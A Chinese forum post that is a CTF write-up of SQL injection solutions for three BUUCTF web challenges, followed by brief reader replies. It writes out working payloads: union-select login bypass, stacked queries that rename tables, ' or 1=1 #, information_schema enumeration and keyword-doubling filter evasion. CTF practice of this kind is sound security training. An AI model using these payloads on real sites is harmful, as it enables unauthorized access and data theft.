【buuctf】WEB SQL wp

孤樱懶契 · 发表于 2021-8-3 12:36

本帖最后由孤樱懶契于 2021-8-3 12:48 编辑

[GXYCTF2019]BabySQli

1、测试注入点

2、发现源码里面有base32到base64的解密

select * from user where username = '$name'
判断有一个user表

3、Order by 找字段

4、用联合查询创建虚拟表进行登录

name=1' union select 1,'admin','21232f297a57a5a743894a0e4a801fc3'#&pw=admin

这里比较坑的就是md5加密没有提示

[强网杯 2019]随便注

1、万能密码注入

1';rename table words to words2; 
rename table `1919810931114514` to `words`;
 alter table words change flag id varchar(100);
  show tables; 
  show columns from words;#

[极客大挑战 2019]LoveSQL

1、万能密码注入

‘ or 1=1 #

2、找字段

' order by 3 #

’ union select 1,2,3; # 找回显

2' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() #

3、爆表

2' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='geekuser' #

2' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #

2' union select 1,2,group_concat(id,username,password) from l0ve1ysq1 #

2' uunionnion sselectelect 1,2,group_concat(id,username,passwoordd) ffromrom l0ve1ysq1 #

Wits · 发表于 2021-8-3 14:28

提示: 作者被禁止或删除内容自动屏蔽

t1r0 · 发表于 2021-8-3 15:49

这算是CTF中比较简单的了

aliya0416 · 发表于 2021-8-3 21:25

大佬就是大佬，学习学习，谢谢楼主整理分享

wss0823 · 发表于 2021-8-4 09:55

现在sql注入难度越来越大了，大部分代码对写入的条件都进行符号的转义了。

Tamluo · 发表于 2021-8-4 12:26

大佬就是大佬，学习学习，谢谢楼主整理分享

帐号		自动登录	找回密码
密码			注册[Register]

Wits Wits 当前离线好友阅读权限 0 听众最后登录 1970-1-1 头像被屏蔽	Wits 发表于 2021-8-3 14:28 提示: 作者被禁止或删除内容自动屏蔽
Wits Wits 当前离线好友阅读权限 0 听众最后登录 1970-1-1 头像被屏蔽	【吾爱破解论坛总版规】 - [让你充分了解吾爱破解论坛行为规则]
	回复支持举报

[CTF] 【buuctf】WEB SQL wp

[GXYCTF2019]BabySQli

[强网杯 2019]随便注

[极客大挑战 2019]LoveSQL

免费评分

浏览过的版块